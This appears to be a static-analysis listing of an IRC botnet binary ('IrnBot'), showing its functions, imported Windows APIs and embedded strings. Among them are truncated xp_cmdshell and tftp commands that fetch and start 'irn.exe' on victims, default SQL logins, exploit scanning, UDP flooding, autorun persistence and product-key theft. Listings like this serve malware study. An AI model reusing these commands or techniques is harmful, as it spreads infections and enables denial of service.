sub_outside():
NTDLL.RtlFreeHeap
NTDLL.RtlGetLastWin32Error
KERNEL32.GetProcessHeap
NTDLL.RtlAllocateHeap
KERNEL32.GetVersionExA
KERNEL32.VirtualProtectEx
KERNEL32.GetFileType
KERNEL32.GetModuleHandleA
KERNEL32.ExitProcess
|
sub_4108B7(0130):
KERNEL32.GetCPInfo
KERNEL32.MultiByteToWideChar
KERNEL32.WideCharToMultiByte
|
sub_41C7BA(01c0):
KERNEL32.GetSystemDirectoryA
KERNEL32.GetModuleHandleA
KERNEL32.GetModuleFileNameA
KERNEL32.CopyFileA
KERNEL32.GetVersionExA
WS2_32.WSAStartup
WS2_32.WSACleanup
"--install "
"Ļ"
"%s\\%s"
"%s %s%s"
"%s"
"¤“±©®³Ø "
"RM"
"BK"
"UNM"
"ĻŃĻ"
|
sub_40F60F(0635):
NTDLL.RtlGetLastWin32Error
|
sub_4119EB(08d2):
"CONOUT$"
|
sub_406424(08e4):
NTDLL.RtlAllocateHeap
NTDLL.RtlFreeHeap
|
sub_405826(090a):
KERNEL32.GetModuleHandleA
KERNEL32.GetProcessHeap
KERNEL32.InterlockedIncrement
"KERNEL32.DLL"
|
sub_419D3D(0947):
KERNEL32.GetModuleHandleA
KERNEL32.GetModuleFileNameA
KERNEL32.GetSystemDirectoryA
"@echo off\r\n:1\r\ndel \"%s\"\r\nif exist \"%s\" "...
"%s\\tmp-%i%i%i-%c%c%c.bat"
"w"
"%s"
|
sub_41A4A1(0b81):
WS2_32.send
NTDLL.RtlGetLastWin32Error
|
sub_410B67(0c06):
KERNEL32.GetProcessHeap
NTDLL.RtlAllocateHeap
NTDLL.RtlFreeHeap
NTDLL.RtlGetLastWin32Error
|
sub_41BD8A(0e5a):
WS2_32.socket
WS2_32.htons
WS2_32.sendto
WS2_32.recvfrom
WS2_32.inet_ntoa
WS2_32.closesocket
"rb"
"ĀĀŅŅĀĀ"
"TFTP: Send Complete To %s. %d Total Sen"...
|
sub_418FDD(0f66):
WS2_32.accept
|
sub_41A8D9(15eb):
"SYSTEM\\ControlSet001\\Services\\Eventlog\\"...
"%s\\%s"
"LDM"
"NetDDE"
"EventMessageFile"
|
sub_41C2DF(16d8):
WS2_32.socket
WS2_32.inet_addr
WS2_32.gethostbyname
WS2_32.htons
WS2_32.sendto
KERNEL32.GetCurrentThreadId
"UDP: Error Sending UDP Packets to %s"
"UDP: Sending UDP Packets to %s"
"UDP: Finished Sending UDP Packets to %s"...
|
sub_40FAE4(1716):
KERNEL32.MultiByteToWideChar
"USER32.DLL"
"MessageBoxA"
"GetActiveWindow"
"GetLastActivePopup"
"GetUserObjectInformationA"
"GetProcessWindowStation"
|
sub_419016(17c7):
"%x"
|
sub_417F4C(191f):
WS2_32.send
|
sub_40507E(1b24):
KERNEL32.GetCPInfo
|
sub_4033CB(1c1d):
KERNEL32.SetUnhandledExceptionFilter
KERNEL32.GetCurrentProcess
|
sub_40B76B(1fb3):
KERNEL32.SetUnhandledExceptionFilter
|
sub_40DB93(240f):
KERNEL32.WideCharToMultiByte
NTDLL.RtlGetLastWin32Error
|
sub_41A889(2492):
WS2_32.send
|
sub_40609D(2585):
NTDLL.RtlAllocateHeap
|
sub_4022EB(283c):
WS2_32.inet_addr
WS2_32.gethostbyaddr
"Net: IP: %s Host: N/A"
"Net: IP: %s Host: %s"
|
sub_40E632(2989):
NTDLL.RtlGetLastWin32Error
KERNEL32.GetFileType
|
sub_41B1F3(2b9b):
"HARDWARE\\DESCRIPTION\\System\\CentralProc"...
"~MHz"
"ProcessorNameString"
"%s"
"%s%c"
"Unknown"
"HARDWARE\\DESCRIPTION\\System\\CentralProc"...
|
sub_41810B(2ce1):
KERNEL32.GetTickCount
"qwertyuiopasdfghjklzxcvbnmQWERTYUIOPLKJ"...
"["
"%s%s|"
"%s%s|"
"%sP|"
"%s0%I64u|"
"%s%I64u|"
"%s%c"
"%s]"
|
sub_402FD3(2daa):
NTDLL.RtlSizeHeap
|
sub_4182F6(2e07):
" "
"-s"
"/s"
" "
|
sub_41A33D(2f90):
"SsOlbZVCofUWrKFh"
"SsOlbZVCofUWrKFh"
|
sub_40F44E(34be):
NTDLL.RtlLeaveCriticalSection
|
sub_40F97D(364e):
KERNEL32.MultiByteToWideChar
|
sub_40A36D(3aac):
NTDLL.RtlGetLastWin32Error
KERNEL32.MultiByteToWideChar
|
sub_419E99(3b18):
KERNEL32.CreateProcessA
|
sub_48EDFE(3f76):
USER32.MessageBoxA
KERNEL32.ExitProcess
|
sub_411990(4634):
KERNEL32.GetModuleHandleA
"KERNEL32"
"IsProcessorFeaturePresent"
|
sub_411014(4658):
"e+000"
|
sub_418CAF(4738):
WS2_32.socket
WS2_32.closesocket
WS2_32.gethostbyname
WS2_32.htons
WS2_32.connect
"± ²²"
"%s %s\r\n"
"%s-%s"
"ÆØ¢Ŗ"
"“²¤³"
"%s %s\r\n%s %s 0 0 :%s\r\n"
|
sub_401DED(496a):
"Ļ"
"http://%s:%d/%s"
|
sub_41A2E3(4a5c):
"user32.dll"
|
sub_40C8FC(4d78):
KERNEL32.GetStringTypeW
NTDLL.RtlGetLastWin32Error
KERNEL32.MultiByteToWideChar
|
sub_402AA2(4e0b):
"Statistics: Exploits:"
"NETAPI"
"%s %s: %d"
"%s; Daemons:"
"%s TFTP: %d"
"%s HTTP: %d"
|
sub_40874A(4f5e):
NTDLL.RtlEnterCriticalSection
|
sub_40879C(4f5e):
NTDLL.RtlLeaveCriticalSection
|
sub_417C06(50c0):
KERNEL32.GetSystemDirectoryA
"¤“±Į²"
"Ļ"
"SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
"SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
|
sub_4024A4(51c2):
"NETAPI"
"NETAPI"
"Scan: Unknown Exploit."
"*.*.*.*"
"-a"
"-b"
"-c"
"Scan: Not Enough Threads. %d Available."...
"%d.%d.%d.%d"
"x."
"%d."
"%s%d."
"%sx."
"%sx"
"%s%d"
"%d.%d.%d.%d"
"%d.%d.%d.x"
"%d.%d.x.x"
"%d.x.x.x"
"Scan: %s:%d Using %d Threads."
"Scanner"
|
sub_402129(56d8):
KERNEL32.GetSystemDirectoryA
"System: %s [CPU: %i x %s @ %dMhz] [RAM:"...
|
sub_405521(5886):
KERNEL32.InterlockedIncrement
|
sub_40AC3F(58d9):
"pow"
"exp"
"exp"
"log10"
"log10"
"log"
"log"
"pow"
"pow"
"exp10"
|
sub_48C150(598a):
KERNEL32.ExitProcess
|
sub_405E8A(5be9):
KERNEL32.GetProcessHeap
|
sub_48ED48(5c01):
KERNEL32.GetModuleHandleA
KERNEL32.LoadLibraryA
KERNEL32.GetProcAddress
|
sub_41463A(5e10):
WS2_32.select
WS2_32.recv
WS2_32.socket
WS2_32.connect
WS2_32.send
WS2_32.closesocket
KERNEL32.GetCurrentThreadId
|
sub_417FE1(5fcf):
WS2_32.send
"±³Ø·¬²¦"
"%s %s %s\r\n"
|
sub_41BB5A(6107):
WS2_32.inet_ntoa
"sa"
"root"
"admin"
"DRIVER={SQL Server};SERVER=%s,%d;UID=%s"...
"EXEC master..xp_cmdshell 'tftp -i %s GE"...
"NETAPI"
"%s: Exploited %s."
|
sub_401C1D(6279):
"QUIT :Irn Powered\r\n"
|
sub_41C4FC(64a5):
WININET.InternetOpenA
WININET.InternetOpenUrlA
KERNEL32.GetTickCount
WININET.InternetReadFile
KERNEL32.GetCurrentThreadId
"Mozilla/5.0"
"DL: Downloading %s to %s"
"DL: Download %s (%i Bytes) finished in "...
"Main: Uninstalling Drone"
"DL: Failed; Bad Location."
"DL: Failed To Update"
"DL: Error Executing File."
"DL: Executed File: %s"
"DL: Failed; Bad URL"
"DL: Failed; WinINET Error"
|
sub_410D1B(65eb):
NTDLL.RtlGetLastWin32Error
|
sub_401DA7(681d):
"System Uptime: %I64u Days, %I64u Hours,"...
|
sub_40F470(68c8):
NTDLL.RtlEnterCriticalSection
NTDLL.RtlLeaveCriticalSection
|
sub_4087BF(6a78):
"ccs="
"UTF-8"
"UTF-16LE"
"UNICODE"
|
sub_4016BA(6c31):
"list too long"
|
sub_40121E(6c31):
"list too long"
|
sub_41A0E3(6d5f):
"Registry Monitor"
"¤“±Į²"
"SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
"QUIT :%s YOU KILLED ME :< --UPDATED\r\n"
|
sub_405004(705a):
KERNEL32.GetACP
|
sub_410A9C(71e5):
NTDLL.RtlGetLastWin32Error
KERNEL32.WideCharToMultiByte
|
sub_40D0D4(7249):
KERNEL32.GetModuleHandleA
KERNEL32.MultiByteToWideChar
NTDLL.RtlRestoreLastWin32Error
"kernel32.dll"
"InitializeCriticalSectionAndSpinCount"
|
sub_41913F(726a):
"\r\n"
" "
" "
" "
"\r\n\r\n"
|
sub_414954(75f1):
"SOFTWARE\\MICROSOFT\\Windows NT\\CurrentVe"...
"B"
"C"
"D"
"W"
"DigitalProductId"
"-"
"%s"
|
sub_404C4E(7a5e):
KERNEL32.SetUnhandledExceptionFilter
KERNEL32.GetCurrentProcess
|
sub_48E94F(7aeb):
KERNEL32.ExitProcess
|
sub_41A70B(7c37):
"SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
"SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
"SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
"SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
|
sub_407E41(7c8f):
KERNEL32.GetModuleHandleA
"mscoree.dll"
"CorExitProcess"
|
sub_419AD1(7d6d):
KERNEL32.GetVersionExA
"VIS"
"2K3"
"XP"
"2K"
"ME"
"98"
"NT"
"95"
"UNK"
"[OS: Microsoft Windows %s %s (%i.%i bui"...
"%s"
|
sub_402C47(7f6b):
"invalid string position"
|
sub_41452B(7fe8):
WS2_32.select
WS2_32.__WSAFDIsSet
WS2_32.recv
WS2_32.send
|
sub_419A20(824c):
KERNEL32.QueryPerformanceCounter
|
sub_41B13F(8359):
WS2_32.htons
WS2_32.socket
WS2_32.connect
WS2_32.closesocket
WS2_32.send
|
sub_40D27E(83d5):
NTDLL.RtlGetLastWin32Error
|
sub_401EF9(85c4):
"S4:Already Running"
|
sub_404DD6(87b5):
KERNEL32.GetCPInfo
|
sub_413F3C(8861):
WS2_32.socket
WS2_32.htons
WS2_32.ioctlsocket
WS2_32.connect
WS2_32.select
WS2_32.closesocket
|
sub_419C46(88b5):
WS2_32.getsockname
"%d.%d.%d.%d"
|
sub_418F1C(8bd0):
"ÆØ¢Ŗ"
"%s %s\r\n"
|
sub_4055A7(9237):
KERNEL32.InterlockedDecrement
|
sub_4184BD(93dd):
"%s"
" :"
"%s"
" "
"%s"
" "
"±ØƦ"
"ŖØ¢Ŗ"
"±³Ø·¬²¦"
"±®Æ¦"
"%s %s\r\n"
"ĀĀŅŅĀĀ"
"«®ØÆ"
"%s %s %s\r\n"
"001"
"«®ØÆ"
"¬®„¤"
"ĀĀŅŅĀĀ"
"%s %s %s\r\n%s %s %s\r\n"
"332"
" :"
"%s"
"!"
"%s"
"332"
"%s"
"%s"
"%s"
"”ÕÓŃĻĢĻ"
";"
";"
";"
|
sub_41979F(9941):
KERNEL32.GetSystemDirectoryA
WS2_32.socket
WS2_32.closesocket
WS2_32.htons
WS2_32.bind
WS2_32.WSAAsyncSelect
WS2_32.listen
"Ļ"
"%s\\%s"
|
sub_401D0C(a01a):
"JOIN %s %s\r\n"
"JOIN %s\r\n"
"I: Insufficient Arguments."
|
sub_41A3CC(a203):
KERNEL32.GetTickCount
WS2_32.send
NTDLL.RtlGetLastWin32Error
|
sub_402385(a305):
"UDP: Insufficient Arguments."
|
sub_40D41A(a83e):
KERNEL32.WideCharToMultiByte
NTDLL.RtlGetLastWin32Error
|
sub_41BF8C(a924):
WS2_32.socket
WS2_32.setsockopt
WS2_32.htons
WS2_32.bind
WS2_32.closesocket
WS2_32.select
WS2_32.recvfrom
|
sub_405A96(a9bf):
KERNEL32.GetModuleHandleA
KERNEL32.TlsGetValue
KERNEL32.TlsAlloc
KERNEL32.TlsSetValue
KERNEL32.GetCurrentThreadId
"KERNEL32.DLL"
"FlsGetValue"
"FlsSetValue"
"FlsFree"
|
sub_41AB0C(aba5):
KERNEL32.GetCurrentProcessId
KERNEL32.GetModuleHandleA
WS2_32.send
KERNEL32.GetSystemDirectoryA
NTDLL.RtlGetLastWin32Error
KERNEL32.GetCurrentThreadId
"OpenThread"
"kernel32.dll"
"OpenProcess"
"kernel32.dll"
"CreateToolhelp32Snapshot"
"kernel32.dll"
"Process32First"
"kernel32.dll"
"kernel32.dll"
"kernel32.dll"
"Module32Next"
"kernel32.dll"
"kernel32.dll"
"Thread32Next"
"kernel32.dll"
"ReadProcessMemory"
"kernel32.dll"
"GetModuleFileNameExA"
"psapi.dll"
"%s\\%s"
"SeDebugPrivilege"
"SeDebugPrivilege"
"System"
"ĀĀŅŅĀĀ"
"Bot Killed: %s"
|
sub_403C6E(ad53):
NTDLL.RtlAllocateHeap
|
sub_40B74A(add8):
KERNEL32.SetUnhandledExceptionFilter
|
sub_419997(aecd):
"HS"
|
sub_40B414(b143):
KERNEL32.GetModuleFileNameA
"C:\\m_unpacker\\packed.exe"
|
sub_4191D2(b570):
WS2_32.recv
WS2_32.send
WS2_32.getpeername
WS2_32.gethostbyaddr
WS2_32.closesocket
"GET"
"Que?"
"HTTP/1.1 501 Not Implemented\r\nContent-L"...
"%s\\%s\\%s"
"%s\\%s\\%s%s"
"%s\\%s"
"Que?"
"Que?"
"HTTP/1.1 200 ok\r\nContent-Length: %d\r\nCo"...
"ĀĀŅŅĀĀ"
"HTTP: Transfer: %d.%d.%d.%d (N/A). %d T"...
"HTTP: Transfer: %d.%d.%d.%d (%s). %d To"...
|
sub_41A258(b9ea):
KERNEL32.GetCurrentProcess
KERNEL32.VirtualAllocEx
KERNEL32.VirtualProtectEx
WS2_32.send
KERNEL32.VirtualFreeEx
|
sub_405FB7(c36e):
NTDLL.RtlEnterCriticalSection
|
sub_40B64A(c391):
KERNEL32.GetCurrentProcessId
KERNEL32.GetCurrentThreadId
KERNEL32.GetTickCount
KERNEL32.QueryPerformanceCounter
|
sub_4198C0(c642):
WS2_32.recv
"IrnBot"
|
sub_405EDF(c70d):
NTDLL.RtlLeaveCriticalSection
|
sub_401D67(c802):
"PART %s\r\n"
"I: Insufficient Arguments."
|
sub_48A195(c905):
KERNEL32.GetProcAddress
KERNEL32.ExitProcess
|
sub_408DA0(ca1e):
KERNEL32.GetFileType
KERNEL32.GetStdHandle
KERNEL32.LockResource
|
sub_40A074(cd6e):
KERNEL32.GetModuleFileNameA
KERNEL32.GetStdHandle
"Runtime Error!\n\nProgram: "
""
"..."
"\n\n"
"Microsoft Visual C++ Runtime Library"
|
sub_40B4CD(ced3):
KERNEL32.GetEnvironmentStringsW
NTDLL.RtlGetLastWin32Error
KERNEL32.WideCharToMultiByte
KERNEL32.FreeEnvironmentStringsW
|
sub_404F60(d02f):
KERNEL32.InterlockedDecrement
KERNEL32.InterlockedIncrement
|
sub_41B423(d2fa):
WS2_32.inet_ntoa
KERNEL32.GetTickCount
NTDLL.RtlGetLastWin32Error
WS2_32.send
"\\\\%s\\pipe\\browser"
"Ļ"
"http://%s:%d/%s"
"ŪĪĪĻĻĪĪĻ"...
"NETAPI"
"%s: Exploited: %s."
|
sub_40DF0F(d327):
NTDLL.RtlAllocateHeap
|
sub_4147B2(d3bd):
WS2_32.socket
WS2_32.htons
WS2_32.bind
WS2_32.listen
KERNEL32.GetCurrentThreadId
WS2_32.accept
"S4: bind() Error"
"S4: %s:%i"
"SC"
|
sub_40871B(d432):
NTDLL.RtlEnterCriticalSection
|
sub_40876D(d432):
NTDLL.RtlLeaveCriticalSection
|
sub_40C517(d5b0):
KERNEL32.LCMapStringW
NTDLL.RtlGetLastWin32Error
KERNEL32.MultiByteToWideChar
KERNEL32.WideCharToMultiByte
|
sub_405229(d858):
KERNEL32.InterlockedDecrement
KERNEL32.InterlockedIncrement
|
sub_41C12F(dd03):
KERNEL32.GetModuleHandleA
KERNEL32.GetModuleFileNameA
"TFTP Server"
|
sub_40F3AE(e051):
NTDLL.RtlEnterCriticalSection
|
sub_405975(e07f):
KERNEL32.InterlockedDecrement
|
sub_411A0A(e22c):
KERNEL32.GetCPInfo
|
sub_4019F3(e2f5):
"ŲŠÕŠ¤×ŅÓŠÕŌ¤ÓŲ Ņ¢¢ŃÓŅÓŁ Ł×ÕŌ„§Ō„ף Ņ§¢¢"...
"UPD: Auth Failure."
"UPD: Invalid Arguments."
|
sub_40E02D(e37e):
NTDLL.RtlAllocateHeap
|
sub_413071(e396):
"1#SNAN"
"1#IND"
"1#INF"
"1#QNAN"
|
sub_4056E7(e3a2):
KERNEL32.TlsGetValue
KERNEL32.GetModuleHandleA
"KERNEL32.DLL"
|
sub_405753(e3a2):
KERNEL32.TlsGetValue
KERNEL32.GetModuleHandleA
"KERNEL32.DLL"
|
sub_4057BF(e3de):
KERNEL32.TlsGetValue
KERNEL32.TlsSetValue
|
sub_406043(e479):
KERNEL32.HeapCreate
|
sub_408A61(e48e):
NTDLL.RtlEnterCriticalSection
|
sub_417D99(e4c8):
KERNEL32.GetSystemDirectoryA
"¤“±Į²"
"Ļ"
"%s\\%s"
"SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
"SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
|
sub_41077D(e6d5):
KERNEL32.SetUnhandledExceptionFilter
|
sub_41AFFD(ead5):
WS2_32.htons
WS2_32.socket
WS2_32.closesocket
WS2_32.connect
WS2_32.recv
WS2_32.send
"tftp -i %s GET irn.exe&start irn.exe&ex"...
|
sub_402086(ed2d):
WS2_32.closesocket
"S4: Thread Stopped"
"S4: No Thread Running"
|
sub_4057B6(ef17):
KERNEL32.TlsAlloc
|
sub_418B81(ef3c):
WS2_32.recv
WS2_32.closesocket
"\r\n"
"%s"
"\r\n"
|
sub_4058DA(efa1):
NTDLL.RtlGetLastWin32Error
KERNEL32.TlsGetValue
KERNEL32.GetCurrentThreadId
NTDLL.RtlRestoreLastWin32Error
|
sub_41C1B3(f270):
"%s"
"%s%X"
|
sub_40177B(f394):
"Š„¢Ų§£Õ„ŲÖŅ£ŠŲ£„ÓŲ „„ŲÕ££ŅŅŠŁ×§Ō££ÓŠÕÓ£"...
"DL: Auth Failure."
"DL: Invalid Arguments"
|
sub_406110(f7b2):
KERNEL32.TlsSetValue
NTDLL.RtlFreeHeap
|
sub_40900D(fb55):
NTDLL.RtlGetLastWin32Error
|
sub_419FC7(fec7):
"192.168.*.*"
"10.*.*.*"
"111.*.*.*"
"15.*.*.*"
"16.*.*.*"
"101.*.*.*"
"110.*.*.*"
"112.*.*.*"
"172.%d.*.*"
|